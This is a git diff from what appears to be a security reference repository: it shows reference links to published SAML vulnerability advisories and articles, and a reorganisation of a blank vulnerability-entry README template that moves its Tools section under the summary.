+- [ORACLE WEBLOGIC - MULTIPLE SAML VULNERABILITIES (CVE-2018-2998/CVE-2018-2933) - Denis Andzakovic - Jul 18, 2018](https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities) +- [Truncation of SAML Attributes in Shibboleth 2 - 2018-01-15 - redteam-pentesting.de](https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-013/-truncation-of-saml-attributes-in-shibboleth-2) +- [Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them - March 7th, 2017 - Jem Jensen](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) \ No newline at end of file diff --git a/_template_vuln/README.md b/_template_vuln/README.md index 405a0ca..9081230 100644 --- a/_template_vuln/README.md +++ b/_template_vuln/README.md @@ -2,17 +2,18 @@ > Vulnerability description - reference -Tools: - -- [Tool name - description](https://example.com) - ## Summary -* [Something](#something) +- [Tools](#tools) * [Something](#something) * [Subentry 1](#sub1) * [Subentry 2](#sub2) +## Tools + +- [Tool 1](https://example.com) +- [Tool 2](https://example.com) + ## Something Quick explanation